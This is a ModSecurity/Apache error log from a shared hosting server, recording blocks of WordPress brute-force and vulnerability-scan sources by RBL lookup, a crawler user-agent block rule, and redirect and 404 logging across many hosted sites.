[Tue May 26 20:05:11.345924 2026] [security2:error] [pid 112029:tid 112269] [client 185.191.171.16:49324] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWvn6FW0C-ajaCsyFdIoQAAAXg"]
[Tue May 26 20:05:11.346071 2026] [security2:error] [pid 112029:tid 112269] [client 185.191.171.16:49324] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWvn6FW0C-ajaCsyFdIoQAAAXg"]
[Tue May 26 20:05:11.375638 2026] [security2:error] [pid 112029:tid 112281] [client 192.42.116.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvnqFW0C-ajaCsyFdIngABhCc"], referer: https://kingsclub.in/yoga
[Tue May 26 20:05:13.226290 2026] [security2:error] [pid 113091:tid 113348] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvoKPxBGSmlFNOy6pUzgAAApM"]
[Tue May 26 20:05:15.378155 2026] [security2:error] [pid 113091:tid 113335] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvoqPxBGSmlFNOy6pVFQAAAoY"]
[Tue May 26 20:05:17.033538 2026] [security2:error] [pid 113091:tid 113330] [client 65.109.104.153:60366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 153.104.109.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWvpKPxBGSmlFNOy6pVVwAAAoE"], referer: https://www.cagmedya.com/kayseri-web-tasarim/
[Tue May 26 20:05:17.595752 2026] [security2:error] [pid 113091:tid 113099] [remote 216.73.216.30:60493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWvpaPxBGSmlFNOy6pVdQACkQc"]
[Tue May 26 20:05:17.690864 2026] [autoindex:error] [pid 113091:tid 113242] [client 62.84.183.161:51619] AH01276: Cannot serve directory /home2/busin5a5/public_html/.well-known/: No matching DirectoryIndex (index.html,index.php) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 20:05:17.751042 2026] [security2:error] [pid 113091:tid 113341] [client 66.249.64.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWvpaPxBGSmlFNOy6pVfQAAAow"]
[Tue May 26 20:05:17.753977 2026] [security2:error] [pid 113091:tid 113327] [client 66.249.64.109:49213] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWvpaPxBGSmlFNOy6pVdwAAAn4"]
[Tue May 26 20:05:18.269008 2026] [security2:error] [pid 113091:tid 113229] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvpaPxBGSmlFNOy6pVgQAAAhw"]
[Tue May 26 20:05:20.529024 2026] [security2:error] [pid 112029:tid 112084] [remote 222.165.190.235:59134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvqKFW0C-ajaCsyFdJQgABDjY"]
[Tue May 26 20:05:20.712976 2026] [security2:error] [pid 113091:tid 113249] [client 66.249.64.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWvqKPxBGSmlFNOy6pV-gAAAjA"]
[Tue May 26 20:05:20.713344 2026] [security2:error] [pid 113091:tid 113342] [client 66.249.64.110:53110] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWvqKPxBGSmlFNOy6pV8wAAAo0"]
[Tue May 26 20:05:20.827330 2026] [security2:error] [pid 112029:tid 112164] [client 49.36.127.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWvqKFW0C-ajaCsyFdJUwAAAQ8"], referer: http://www.ucdc.co.in/
[Tue May 26 20:05:20.843821 2026] [autoindex:error] [pid 112029:tid 112181] [client 49.36.127.153:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.ucdc.co.in/
[Tue May 26 20:05:20.860039 2026] [security2:error] [pid 112029:tid 112274] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvqKFW0C-ajaCsyFdJRQAAAX0"]
[Tue May 26 20:05:20.978088 2026] [security2:error] [pid 112029:tid 112104] [remote 222.165.190.235:59134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvqKFW0C-ajaCsyFdJVwABV0o"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:05:22.814427 2026] [security2:error] [pid 113091:tid 113192] [remote 74.7.242.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvqqPxBGSmlFNOy6pWXQACi2Q"], referer: https://kingsclub.in/events-2//
[Tue May 26 20:05:23.304421 2026] [ssl:error] [pid 113091:tid 113198] [remote 190.103.29.30:43800] AH02032: Hostname blog.jhonweb.com provided via SNI and hostname www.jhonweb.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://blog.jhonweb.com/
[Tue May 26 20:05:23.467102 2026] [security2:error] [pid 113091:tid 113201] [remote 217.174.148.171:33844] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 171.148.174.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWvq6PxBGSmlFNOy6pWlgACNG0"]
[Tue May 26 20:05:23.519411 2026] [security2:error] [pid 112029:tid 112187] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvq6FW0C-ajaCsyFdJhwAAASY"]
[Tue May 26 20:05:24.889772 2026] [autoindex:error] [pid 113091:tid 113228] [client 20.89.64.143:49609] AH01276: Cannot serve directory /home2/onesomzc/public_html/www.srworldwide.in/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 20:05:25.359577 2026] [security2:error] [pid 113091:tid 113150] [remote 216.73.216.30:60493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWvraPxBGSmlFNOy6pXDwACkTo"]
[Tue May 26 20:05:26.164713 2026] [security2:error] [pid 112029:tid 112180] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvraFW0C-ajaCsyFdJugAAAR8"]
[Tue May 26 20:05:26.313001 2026] [security2:error] [pid 113091:tid 113191] [remote 217.174.148.171:33844] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 171.148.174.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWvrqPxBGSmlFNOy6pXPQACc2M"], referer: https://yndglobal.com/wp-login.php
[Tue May 26 20:05:26.706477 2026] [security2:error] [pid 112029:tid 112169] [client 14.187.48.74:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvrqFW0C-ajaCsyFdJwwAAARQ"]
[Tue May 26 20:05:28.545844 2026] [security2:error] [pid 112029:tid 112273] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvsKFW0C-ajaCsyFdJ8gAAAXw"]
[Tue May 26 20:05:31.068597 2026] [security2:error] [pid 112029:tid 112284] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvsqFW0C-ajaCsyFdKOgAAAYc"]
[Tue May 26 20:05:33.498974 2026] [security2:error] [pid 112029:tid 112262] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvtaFW0C-ajaCsyFdKXAAAAXE"]
[Tue May 26 20:05:35.981114 2026] [security2:error] [pid 112029:tid 112192] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvt6FW0C-ajaCsyFdKmAAAASs"]
[Tue May 26 20:05:37.329655 2026] [autoindex:error] [pid 112029:tid 112166] [client 49.36.127.153:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.ucdc.co.in/
[Tue May 26 20:05:39.001395 2026] [security2:error] [pid 112029:tid 112212] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvuqFW0C-ajaCsyFdK0AAAAT8"]
[Tue May 26 20:05:41.257010 2026] [security2:error] [pid 112029:tid 112272] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvvKFW0C-ajaCsyFdK7wAAAXs"]
[Tue May 26 20:05:41.504963 2026] [security2:error] [pid 113091:tid 113175] [remote 159.203.25.248:38908] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 248.25.203.159.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWvvaPxBGSmlFNOy6pZGgACOFM"]
[Tue May 26 20:05:41.612487 2026] [security2:error] [pid 112029:tid 112257] [client 170.199.228.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWvvaFW0C-ajaCsyFdLAgAAAWw"], referer: https://www.anujtradingco.com/
[Tue May 26 20:05:41.705205 2026] [security2:error] [pid 113091:tid 113180] [remote 159.203.25.248:38908] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 248.25.203.159.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWvvaPxBGSmlFNOy6pZJgACeVg"], referer: https://moes-art.com/wp-login.php
[Tue May 26 20:05:42.933100 2026] [security2:error] [pid 112029:tid 112203] [client 66.249.64.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWvvqFW0C-ajaCsyFdLDgAAATY"]
[Tue May 26 20:05:42.933438 2026] [security2:error] [pid 113091:tid 113230] [client 66.249.64.109:59201] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWvvqPxBGSmlFNOy6pZWAAAAh0"]
[Tue May 26 20:05:43.423485 2026] [security2:error] [pid 113091:tid 113333] [client 170.199.228.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWvv6PxBGSmlFNOy6pZZQAAAoQ"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1231260&moderation-hash=4e97258ee3c811d5af5ba9e1633ff3e2
[Tue May 26 20:05:43.685118 2026] [security2:error] [pid 113091:tid 113277] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvv6PxBGSmlFNOy6pZYwAAAkw"]
[Tue May 26 20:05:45.594656 2026] [security2:error] [pid 113091:tid 113203] [remote 136.110.38.51:58890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 51.38.110.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahWvwaPxBGSmlFNOy6pZswACdm8"]
[Tue May 26 20:05:45.676197 2026] [security2:error] [pid 113091:tid 113223] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvwaPxBGSmlFNOy6pZrAAAAhY"]
[Tue May 26 20:05:46.899878 2026] [security2:error] [pid 113091:tid 113280] [client 185.242.3.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahWvwqPxBGSmlFNOy6pZ7gAAAk8"]
[Tue May 26 20:05:47.297172 2026] [security2:error] [pid 112029:tid 112283] [client 66.249.64.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWvw6FW0C-ajaCsyFdLTQAAAYY"]
[Tue May 26 20:05:47.297762 2026] [security2:error] [pid 113091:tid 113240] [client 66.249.64.109:59201] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWvw6PxBGSmlFNOy6pZ-AAAAic"]
[Tue May 26 20:05:47.606592 2026] [security2:error] [pid 112029:tid 112274] [client 185.242.3.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWvw6FW0C-ajaCsyFdLSgAAAX0"]
[Tue May 26 20:05:48.096455 2026] [security2:error] [pid 112029:tid 112193] [client 31.57.184.107:64367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "aarini.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWvw6FW0C-ajaCsyFdLYwAAASw"], referer: https://www.facebook.com/
[Tue May 26 20:05:48.809383 2026] [security2:error] [pid 113091:tid 113153] [remote 160.250.186.220:40176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvxKPxBGSmlFNOy6paEwACQD0"]
[Tue May 26 20:05:48.889514 2026] [security2:error] [pid 112029:tid 112175] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvxKFW0C-ajaCsyFdLcQAAARo"]
[Tue May 26 20:05:49.231787 2026] [security2:error] [pid 112029:tid 112036] [remote 14.161.17.36:41296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWvxaFW0C-ajaCsyFdLjgABPgY"]
[Tue May 26 20:05:49.304216 2026] [security2:error] [pid 113091:tid 113148] [remote 160.250.186.220:40176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvxaPxBGSmlFNOy6paHgACJTg"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:05:51.510676 2026] [security2:error] [pid 113091:tid 113224] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvx6PxBGSmlFNOy6paXQAAAhc"]
[Tue May 26 20:05:53.491528 2026] [security2:error] [pid 112029:tid 112274] [client 170.199.228.120:8481] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWvyaFW0C-ajaCsyFdL5wAAAX0"], referer: https://anujtradingco.com
[Tue May 26 20:05:53.748133 2026] [security2:error] [pid 112029:tid 112228] [client 186.130.24.174:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvyaFW0C-ajaCsyFdL7gAAAU8"]
[Tue May 26 20:05:53.901825 2026] [security2:error] [pid 112029:tid 112202] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvyaFW0C-ajaCsyFdL-QAAATU"]
[Tue May 26 20:05:54.164346 2026] [security2:error] [pid 113091:tid 113271] [client 38.188.191.241:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWvyaPxBGSmlFNOy6paqQAAAkY"]
[Tue May 26 20:05:54.570949 2026] [security2:error] [pid 112029:tid 112049] [remote 79.112.96.62:47200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.96.112.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWvyqFW0C-ajaCsyFdMCQABChM"]
[Tue May 26 20:05:55.011004 2026] [security2:error] [pid 112029:tid 112045] [remote 79.112.96.62:47200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.96.112.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWvyqFW0C-ajaCsyFdMDQABEg8"], referer: https://jhonweb.com/wp-login.php
[Tue May 26 20:05:55.394214 2026] [security2:error] [pid 113091:tid 113171] [remote 211.23.68.235:9672] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvy6PxBGSmlFNOy6pa4wACXE8"]
[Tue May 26 20:05:55.962866 2026] [security2:error] [pid 113091:tid 113180] [remote 217.112.89.35:35670] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvy6PxBGSmlFNOy6pbAQACN1g"]
[Tue May 26 20:05:56.399144 2026] [security2:error] [pid 112029:tid 112267] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvy6FW0C-ajaCsyFdMGwAAAXY"]
[Tue May 26 20:05:56.622947 2026] [security2:error] [pid 113091:tid 113196] [remote 217.112.89.35:35670] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvzKPxBGSmlFNOy6pbFwACV2g"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:05:57.574637 2026] [security2:error] [pid 113091:tid 113193] [remote 216.73.216.30:60493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWvzaPxBGSmlFNOy6pbOwACkWU"]
[Tue May 26 20:05:58.093658 2026] [security2:error] [pid 113091:tid 113200] [remote 216.73.216.30:60493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWvzqPxBGSmlFNOy6pbTgACkWw"]
